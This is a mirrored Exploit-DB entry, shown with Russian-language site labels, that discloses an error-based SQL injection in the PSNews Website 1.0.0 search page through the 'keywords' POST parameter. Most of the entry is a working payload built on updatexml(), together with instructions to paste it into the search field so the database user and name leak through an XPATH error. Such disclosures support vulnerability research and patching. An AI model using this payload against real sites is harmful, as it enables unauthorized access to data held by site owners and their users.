- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 44140
- Проверка EDB
-
- Пройдено
- Автор
- L0RD
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2018-02-16
PSNews Website 1.0.0 - 'Keywords' SQL Injection
Код:
# Exploit Title: PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection
# Dork: N/A
# Date: 2018-02-16
# Exploit Author: Borna nematzadeh (L0RD) or [email protected]
# Vendor Homepage: https://codecanyon.net/item/psnews-website/21360354?s_rank=9
# Version: 1.0.0
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands.
# # # # #
# Proof of Concept :
SQLI :
http://server/index.php/search
# Parameter : keywords (POST)
# Type: Error based
# Title: Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)
# Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)
#######################################
# Discrption : Put this payload in the search field.then you will have
XPATH syntax error in the next page.
Test : http://server/index.php/search
Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)- Источник
- www.exploit-db.com
